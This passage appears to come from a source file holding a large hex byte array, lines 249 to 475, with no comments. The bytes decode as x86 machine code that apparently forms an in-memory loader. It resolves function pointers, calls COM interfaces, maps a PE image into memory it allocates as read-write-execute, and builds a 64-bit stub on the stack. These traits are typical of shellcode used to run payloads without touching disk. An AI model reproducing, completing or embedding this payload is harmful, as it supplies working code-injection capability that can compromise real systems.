249 0x52, 0x2c, 0x5d, 0xc2, 0x24, 0x00, 0x53, 0x56, 0x57, 0xe8, 0x42, 0x0f,
250 0x00, 0x00, 0x8b, 0x74, 0x24, 0x14, 0xb9, 0x13, 0x1e, 0x40, 0x00, 0xbf,
251 0xe4, 0x2a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08,
252 0xe8, 0x27, 0x0f, 0x00, 0x00, 0xb9, 0xe5, 0x1a, 0x40, 0x00, 0x2b, 0xcf,
253 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0x14, 0x0f, 0x00, 0x00,
254 0xb9, 0x9c, 0x1e, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
255 0x48, 0x08, 0xe8, 0x01, 0x0f, 0x00, 0x00, 0xb9, 0x5a, 0x1b, 0x40, 0x00,
256 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xee, 0x0e,
257 0x00, 0x00, 0xb9, 0x30, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
258 0x06, 0x89, 0x48, 0x10, 0xe8, 0xdb, 0x0e, 0x00, 0x00, 0xb9, 0x0c, 0x1b,
259 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8,
260 0xc8, 0x0e, 0x00, 0x00, 0xb9, 0x74, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03,
261 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x18, 0xe8, 0xb5, 0x0e, 0x00, 0x00, 0xb9,
262 0x71, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
263 0x1c, 0xe8, 0xa2, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b,
264 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x8f, 0x0e, 0x00,
265 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
266 0x89, 0x48, 0x24, 0xe8, 0x7c, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40,
267 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x28, 0xe8, 0x69,
268 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
269 0x8b, 0x06, 0x89, 0x48, 0x2c, 0xe8, 0x56, 0x0e, 0x00, 0x00, 0xb9, 0x04,
270 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x30,
271 0xe8, 0x43, 0x0e, 0x00, 0x00, 0xb9, 0x84, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
272 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x34, 0xe8, 0x30, 0x0e, 0x00, 0x00,
273 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
274 0x48, 0x38, 0xe8, 0x1d, 0x0e, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00,
275 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x3c, 0xe8, 0x0a, 0x0e,
276 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
277 0x06, 0x89, 0x48, 0x40, 0xe8, 0xf7, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b,
278 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x44, 0xe8,
279 0xe4, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03,
280 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x48, 0xe8, 0xd1, 0x0d, 0x00, 0x00, 0xb9,
281 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
282 0x4c, 0xe8, 0xbe, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b,
283 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x50, 0xe8, 0xab, 0x0d, 0x00,
284 0x00, 0xb9, 0xfc, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06,
285 0x89, 0x48, 0x54, 0xe8, 0x98, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40,
286 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x58, 0xe8, 0x85,
287 0x0d, 0x00, 0x00, 0xb9, 0x28, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
288 0x8b, 0x06, 0x89, 0x48, 0x5c, 0xe8, 0x72, 0x0d, 0x00, 0x00, 0xb9, 0x04,
289 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x60,
290 0xe8, 0x5f, 0x0d, 0x00, 0x00, 0xb9, 0xac, 0x1e, 0x40, 0x00, 0x2b, 0xcf,
291 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x64, 0xe8, 0x4c, 0x0d, 0x00, 0x00,
292 0xb9, 0xf4, 0x1a, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
293 0x48, 0x68, 0xe8, 0x39, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00,
294 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x6c, 0xe8, 0x26, 0x0d,
295 0x00, 0x00, 0xb9, 0x04, 0x1b, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
296 0x06, 0x89, 0x48, 0x70, 0xe8, 0x13, 0x0d, 0x00, 0x00, 0xb9, 0x04, 0x1b,
297 0x40, 0x00, 0x8d, 0x5e, 0x04, 0x2b, 0xcf, 0x8b, 0x7c, 0x24, 0x10, 0x03,
298 0xc8, 0x8b, 0x06, 0x53, 0x89, 0x48, 0x74, 0x8d, 0x87, 0xdc, 0x03, 0x00,
299 0x00, 0x83, 0x66, 0x10, 0x00, 0x50, 0x89, 0x7e, 0x14, 0xff, 0x57, 0x78,
300 0x85, 0xc0, 0x75, 0x13, 0x8b, 0x0b, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87,
301 0x8c, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x52, 0x18, 0x5f,
302 0x5e, 0x5b, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x85, 0xd2, 0x75, 0x07, 0xb8,
303 0x03, 0x40, 0x00, 0x80, 0xeb, 0x5f, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33,
304 0xc9, 0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x14, 0x8b, 0x84,
305 0x8f, 0xfc, 0x03, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83,
306 0xf9, 0x04, 0x75, 0xee, 0xeb, 0x2a, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x0c,
307 0x04, 0x00, 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x08, 0x41, 0x83, 0xf9, 0x04,
308 0x75, 0xee, 0xeb, 0x14, 0x33, 0xc9, 0x8b, 0x84, 0x8f, 0x8c, 0x04, 0x00,
309 0x00, 0x3b, 0x04, 0x8b, 0x75, 0x0c, 0x41, 0x83, 0xf9, 0x04, 0x75, 0xee,
310 0x89, 0x32, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x22, 0x00, 0xb8, 0x02, 0x40,
311 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x44, 0x24, 0x04,
312 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0xfd, 0x8b, 0x40, 0x0c, 0x50, 0x8b, 0x08,
313 0xff, 0x51, 0x38, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x8b, 0x4c, 0x24, 0x04,
314 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x10, 0x48, 0xc2, 0x04, 0x00,
315 0x8b, 0x44, 0x24, 0x04, 0xff, 0x74, 0x24, 0x08, 0x8b, 0x40, 0x14, 0xff,
316 0x50, 0x4c, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x83, 0xec, 0x14, 0x53, 0x8b,
317 0x5c, 0x24, 0x1c, 0x55, 0x56, 0x57, 0x33, 0xff, 0x8d, 0xab, 0x48, 0x07,
318 0x00, 0x00, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8b, 0xc7, 0x89,
319 0x7c, 0x24, 0x10, 0x74, 0x03, 0x8b, 0x6d, 0x00, 0x8b, 0x8b, 0xa4, 0x00,
320 0x00, 0x00, 0x8b, 0x74, 0x24, 0x2c, 0x85, 0xc9, 0x0f, 0x84, 0xc5, 0x01,
321 0x00, 0x00, 0x56, 0x8d, 0x83, 0x2c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83,
322 0x1c, 0x04, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88, 0x89,
323 0x01, 0x00, 0x00, 0x8b, 0x16, 0x8d, 0x7e, 0x04, 0x57, 0x8d, 0x83, 0x3c,
324 0x04, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x8d, 0x45, 0x04, 0x50, 0x52, 0xff,
325 0x51, 0x0c, 0x85, 0xc0, 0x0f, 0x88, 0x62, 0x01, 0x00, 0x00, 0x8b, 0x07,
326 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85,
327 0xc0, 0x0f, 0x88, 0x5c, 0x01, 0x00, 0x00, 0x83, 0x7c, 0x24, 0x14, 0x00,
328 0x74, 0x1a, 0x8b, 0x0f, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x83, 0x5c, 0x04,
329 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x83, 0x4c, 0x04, 0x00, 0x00, 0x50,
330 0x51, 0xff, 0x52, 0x24, 0x33, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x33, 0x01,
331 0x00, 0x00, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85,
332 0xc0, 0x0f, 0x88, 0x05, 0x01, 0x00, 0x00, 0x8d, 0x85, 0x04, 0x02, 0x00,
333 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0x56, 0x08, 0x8b, 0xf8, 0x8d, 0x46,
334 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x0a, 0x57, 0x52, 0x89, 0x44, 0x24, 0x28,
335 0xff, 0x51, 0x30, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x85, 0xf6, 0x0f,
336 0x88, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x18, 0x8b, 0x74, 0x24,
337 0x2c, 0x8b, 0x12, 0x8d, 0x46, 0x10, 0x50, 0x8d, 0x83, 0x6c, 0x04, 0x00,
338 0x00, 0x8b, 0x0a, 0x50, 0x52, 0xff, 0x11, 0x85, 0xc0, 0x0f, 0x88, 0xb5,
339 0x00, 0x00, 0x00, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x85, 0x10, 0x19,
340 0x00, 0x00, 0x89, 0x44, 0x24, 0x1c, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0x6a,
341 0x01, 0x6a, 0x11, 0xff, 0x53, 0x58, 0x8b, 0xf8, 0x85, 0xff, 0x0f, 0x84,
342 0x90, 0x00, 0x00, 0x00, 0x8b, 0x57, 0x0c, 0x33, 0xc0, 0x8b, 0xc8, 0x39,
343 0x85, 0x14, 0x19, 0x00, 0x00, 0x72, 0x2d, 0x77, 0x08, 0x39, 0x85, 0x10,
344 0x19, 0x00, 0x00, 0x76, 0x23, 0x33, 0xdb, 0x8a, 0x84, 0x29, 0x18, 0x19,
345 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x9d, 0x14, 0x19, 0x00, 0x00,
346 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3,
347 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0x4e, 0x10, 0x8d, 0x46, 0x14, 0x50, 0x57,
348 0x51, 0x8b, 0x11, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x1b,
349 0xc0, 0x33, 0xd2, 0x40, 0x8b, 0xca, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x47,
350 0x0c, 0x39, 0x95, 0x14, 0x19, 0x00, 0x00, 0x72, 0x27, 0x77, 0x08, 0x39,
351 0x95, 0x10, 0x19, 0x00, 0x00, 0x76, 0x1d, 0x88, 0x94, 0x29, 0x18, 0x19,
352 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x95, 0x14, 0x19, 0x00, 0x00,
353 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3,
354 0x57, 0xff, 0x53, 0x64, 0x8b, 0x44, 0x24, 0x10, 0x5f, 0x5e, 0x5d, 0x5b,
355 0x83, 0xc4, 0x14, 0xc3, 0x83, 0x27, 0x00, 0xe9, 0xcc, 0xfe, 0xff, 0xff,
356 0x89, 0x3e, 0xe9, 0xc7, 0xfe, 0xff, 0xff, 0x33, 0xff, 0x8d, 0x46, 0x08,
357 0x50, 0x8d, 0x83, 0x5c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83, 0x4c, 0x04,
358 0x00, 0x00, 0x50, 0x57, 0x57, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x85,
359 0xc0, 0x0f, 0x89, 0xab, 0xfe, 0xff, 0xff, 0x89, 0x7e, 0x08, 0x33, 0xc0,
360 0xeb, 0xbe, 0x83, 0xec, 0x6c, 0x53, 0x8b, 0x5c, 0x24, 0x74, 0x33, 0xc0,
361 0x55, 0x56, 0x57, 0x8d, 0x7c, 0x24, 0x3c, 0x33, 0xed, 0x21, 0x6c, 0x24,
362 0x14, 0x8d, 0xb3, 0x48, 0x07, 0x00, 0x00, 0xab, 0xab, 0xab, 0xab, 0x33,
363 0xc0, 0x66, 0x89, 0x44, 0x24, 0x10, 0x40, 0x39, 0x83, 0x0c, 0x05, 0x00,
364 0x00, 0x74, 0x02, 0x8b, 0x36, 0x83, 0x3e, 0x02, 0x0f, 0x85, 0x64, 0x01,
365 0x00, 0x00, 0x8b, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x48, 0x14,
366 0x8d, 0x78, 0x1c, 0x57, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x40, 0x85, 0xc0,
367 0x0f, 0x88, 0x41, 0x01, 0x00, 0x00, 0x8b, 0x07, 0x8d, 0x54, 0x24, 0x14,
368 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x48, 0x85, 0xc0, 0x0f, 0x88, 0x4e,
369 0x02, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x6a, 0x01, 0xff, 0x74,
370 0x24, 0x1c, 0xff, 0x53, 0x68, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x6a, 0x01,
371 0xff, 0x74, 0x24, 0x1c, 0xff, 0x53, 0x6c, 0x8b, 0x44, 0x24, 0x20, 0x2b,
372 0x44, 0x24, 0x24, 0x83, 0xc0, 0x01, 0x0f, 0x84, 0xbc, 0x00, 0x00, 0x00,
373 0x6a, 0x01, 0x6a, 0x00, 0x6a, 0x0c, 0xff, 0x53, 0x5c, 0x8b, 0xe8, 0x33,
374 0xc9, 0x39, 0x8e, 0x04, 0x08, 0x00, 0x00, 0xb8, 0x08, 0x20, 0x00, 0x00,
375 0x66, 0x89, 0x44, 0x24, 0x2c, 0x74, 0x58, 0xff, 0xb6, 0x04, 0x08, 0x00,
376 0x00, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x89, 0x44, 0x24, 0x34, 0x33,
377 0xc0, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x39, 0x86, 0x04, 0x08,
378 0x00, 0x00, 0x76, 0x63, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00,
379 0x03, 0xc6, 0x50, 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00,
380 0x00, 0x00, 0x50, 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x8b, 0x84,
381 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00,
382 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xcb, 0xeb, 0x2c, 0x6a,
383 0x01, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x83, 0xa4, 0x24, 0x80, 0x00,
384 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x34, 0x8d, 0x44, 0x24, 0x10, 0x50,
385 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50,
386 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x83, 0xa4, 0x24, 0x80, 0x00,
387 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x8d, 0x84, 0x24, 0x84,
388 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x83, 0x64, 0x24, 0x44,
389 0x00, 0x8d, 0x54, 0x24, 0x5c, 0x52, 0x33, 0xc0, 0x8d, 0x74, 0x24, 0x40,
390 0x40, 0x66, 0x89, 0x44, 0x24, 0x40, 0x8b, 0x07, 0x55, 0x83, 0xec, 0x10,
391 0x8b, 0xfc, 0x8b, 0x08, 0x50, 0xa5, 0xa5, 0xa5, 0xa5, 0xff, 0x91, 0x94,
392 0x00, 0x00, 0x00, 0x85, 0xed, 0x0f, 0x84, 0x32, 0x01, 0x00, 0x00, 0xff,
393 0x74, 0x24, 0x34, 0xff, 0x53, 0x64, 0x55, 0xff, 0x53, 0x64, 0xe9, 0x22,
394 0x01, 0x00, 0x00, 0x21, 0x2f, 0xe9, 0x1b, 0x01, 0x00, 0x00, 0x8d, 0x86,
395 0x04, 0x04, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0xe8, 0x89, 0x6c,
396 0x24, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x06, 0x01, 0x00, 0x00, 0x8d, 0x86,
397 0x04, 0x06, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x89, 0x44, 0x24, 0x1c,
398 0x85, 0xc0, 0x0f, 0x84, 0xe9, 0x00, 0x00, 0x00, 0x8b, 0x8c, 0x24, 0x84,
399 0x00, 0x00, 0x00, 0x8b, 0x51, 0x14, 0x8d, 0x41, 0x18, 0x50, 0x55, 0x52,
400 0x8b, 0x0a, 0x89, 0x44, 0x24, 0x34, 0xff, 0x51, 0x44, 0x8b, 0xf8, 0x85,
401 0xff, 0x0f, 0x88, 0xbe, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x04, 0x08, 0x00,
402 0x00, 0x33, 0xed, 0x85, 0xc0, 0x74, 0x6e, 0x50, 0x55, 0x6a, 0x0c, 0xff,
403 0x53, 0x5c, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x61, 0x83, 0xa4, 0x24, 0x80,
404 0x00, 0x00, 0x00, 0x00, 0x83, 0xbe, 0x04, 0x08, 0x00, 0x00, 0x00, 0x76,
405 0x50, 0x33, 0xc0, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00, 0x03,
406 0xc6, 0x50, 0xff, 0x53, 0x70, 0x6a, 0x08, 0x89, 0x44, 0x24, 0x58, 0x58,
407 0x66, 0x89, 0x44, 0x24, 0x4c, 0x8d, 0x44, 0x24, 0x4c, 0x50, 0x8d, 0x84,
408 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x8b, 0xf8,
409 0x85, 0xff, 0x79, 0x06, 0x55, 0xff, 0x53, 0x64, 0x33, 0xed, 0x8b, 0x84,
410 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00,
411 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xb2, 0x85, 0xff, 0x78,
412 0x3c, 0x8b, 0x44, 0x24, 0x28, 0x8d, 0x54, 0x24, 0x6c, 0x52, 0x55, 0x83,
413 0xec, 0x10, 0x8d, 0x74, 0x24, 0x54, 0x8b, 0x00, 0x8b, 0xfc, 0x6a, 0x00,
414 0x8b, 0x08, 0xa5, 0x68, 0x18, 0x01, 0x00, 0x00, 0xa5, 0xa5, 0xa5, 0x8b,
415 0x74, 0x24, 0x3c, 0x56, 0x50, 0xff, 0x91, 0xe4, 0x00, 0x00, 0x00, 0x85,
416 0xed, 0x74, 0x04, 0x55, 0xff, 0x53, 0x64, 0x8b, 0x6c, 0x24, 0x18, 0xeb,
417 0x08, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x74, 0x24, 0x1c, 0x56, 0xff, 0x53,
418 0x74, 0x55, 0xff, 0x53, 0x74, 0x33, 0xc0, 0x40, 0x5f, 0x5e, 0x5d, 0x5b,
419 0x83, 0xc4, 0x6c, 0xc3, 0x81, 0xec, 0xdc, 0x00, 0x00, 0x00, 0xb8, 0x01,
420 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x31, 0xc0, 0x48, 0x79, 0x53,
421 0x55, 0x8b, 0xac, 0x24, 0xe8, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x4c,
422 0x89, 0x44, 0x24, 0x54, 0x89, 0x44, 0x24, 0x5c, 0x83, 0xbd, 0x0c, 0x05,
423 0x00, 0x00, 0x01, 0x89, 0x44, 0x24, 0x64, 0x89, 0x44, 0x24, 0x6c, 0x89,
424 0x84, 0x24, 0xa8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xc0, 0x00, 0x00,
425 0x00, 0x89, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd0,
426 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8d, 0x85,
427 0x48, 0x07, 0x00, 0x00, 0x57, 0xc7, 0x44, 0x24, 0x30, 0x1b, 0x8b, 0x44,
428 0x24, 0xc7, 0x44, 0x24, 0x34, 0x04, 0x8b, 0x4c, 0x24, 0xc7, 0x44, 0x24,
429 0x38, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x44, 0x24, 0x3c, 0x0c, 0x52, 0x81,
430 0xc2, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24,
431 0x44, 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x44, 0x24, 0x48, 0xf4, 0xff, 0xd0,
432 0xc3, 0xc7, 0x44, 0x24, 0x4c, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x44, 0x24,
433 0x54, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x5c, 0x89, 0x9c, 0x24,
434 0x38, 0xc7, 0x44, 0x24, 0x64, 0x89, 0xbc, 0x24, 0x20, 0xc7, 0x44, 0x24,
435 0x6c, 0x89, 0xb4, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x74, 0x89, 0xe6, 0x48,
436 0x89, 0xc7, 0x44, 0x24, 0x78, 0xcf, 0xb8, 0x00, 0x02, 0xc7, 0x44, 0x24,
437 0x7c, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00,
438 0xc1, 0x48, 0x8d, 0x14, 0xc7, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x01,
439 0x4c, 0x8d, 0x04, 0xc7, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x02, 0x4d,
440 0x8d, 0x0c, 0xc7, 0x84, 0x24, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x8d,
441 0x1c, 0xc7, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x01, 0x48, 0x89, 0x9c,
442 0xc7, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x24, 0x00, 0x01, 0x00, 0xc7,
443 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x84,
444 0x24, 0x9c, 0x00, 0x00, 0x00, 0x48, 0x89, 0x9c, 0x24, 0xc7, 0x84, 0x24,
445 0xa0, 0x00, 0x00, 0x00, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x84, 0x24, 0xa4,
446 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x84, 0x24, 0xa8, 0x00,
447 0x00, 0x00, 0x89, 0x9c, 0x24, 0x10, 0xc7, 0x84, 0x24, 0xb0, 0x00, 0x00,
448 0x00, 0x01, 0xc3, 0x48, 0x89, 0xc7, 0x84, 0x24, 0xb4, 0x00, 0x00, 0x00,
449 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00, 0x00,
450 0x00, 0xff, 0xd7, 0xc7, 0x84, 0x24, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89,
451 0xf4, 0x48, 0xc7, 0x84, 0x24, 0xc0, 0x00, 0x00, 0x00, 0x8b, 0xb4, 0x24,
452 0x28, 0xc7, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x8b, 0xbc, 0x24, 0x20,
453 0xc7, 0x84, 0x24, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x9c, 0x24, 0x38, 0xc7,
454 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8b, 0xac, 0x24, 0x30, 0xc7, 0x84,
455 0x24, 0xe0, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x48, 0x01, 0xc7, 0x84, 0x24,
456 0xe4, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc3, 0x00, 0x89, 0x44, 0x24, 0x14,
457 0x74, 0x06, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x14, 0x8b, 0xb8, 0x54, 0x19,
458 0x00, 0x00, 0x05, 0x18, 0x19, 0x00, 0x00, 0x03, 0xf8, 0x89, 0x44, 0x24,
459 0x10, 0x33, 0xdb, 0x89, 0x7c, 0x24, 0x18, 0x53, 0xff, 0x55, 0x38, 0x66,
460 0x8b, 0x4f, 0x04, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x50, 0x3c, 0x66, 0x3b,
461 0x4c, 0x02, 0x04, 0x0f, 0x85, 0x80, 0x02, 0x00, 0x00, 0x56, 0x6a, 0x40,
462 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, 0x10, 0x00, 0x00, 0x50, 0x89,
463 0x44, 0x24, 0x28, 0x8b, 0x47, 0x50, 0x03, 0xc1, 0x50, 0x53, 0xff, 0x55,
464 0x3c, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0x59, 0x02, 0x00, 0x00, 0x0f,
465 0xb7, 0x5f, 0x14, 0x33, 0xc0, 0x83, 0x64, 0x24, 0x10, 0x00, 0x83, 0xc3,
466 0x2c, 0x66, 0x3b, 0x47, 0x06, 0x73, 0x37, 0x8b, 0x6c, 0x24, 0x14, 0x03,
467 0xdf, 0xff, 0x73, 0xfc, 0x8b, 0x03, 0x03, 0xc5, 0x50, 0x8b, 0x43, 0xf8,
468 0x03, 0xc6, 0x50, 0xe8, 0xa1, 0x07, 0x00, 0x00, 0x8b, 0x4c, 0x24, 0x1c,
469 0x8d, 0x5b, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x83, 0xc4, 0x0c, 0x41, 0x89,
470 0x4c, 0x24, 0x10, 0x3b, 0xc8, 0x72, 0xd6, 0x8b, 0xac, 0x24, 0xf0, 0x00,
471 0x00, 0x00, 0x8b, 0x9f, 0x80, 0x00, 0x00, 0x00, 0x03, 0xde, 0x89, 0x5c,
472 0x24, 0x14, 0x8b, 0x43, 0x0c, 0x85, 0xc0, 0x74, 0x68, 0x03, 0xc6, 0x50,
473 0xff, 0x55, 0x30, 0x8b, 0x53, 0x10, 0x89, 0x44, 0x24, 0x28, 0x03, 0xd6,
474 0x8b, 0x03, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x24, 0x89, 0x44, 0x24, 0x10,
475 0x8b, 0x08, 0x85, 0xc9, 0x74, 0x35, 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0xfa,
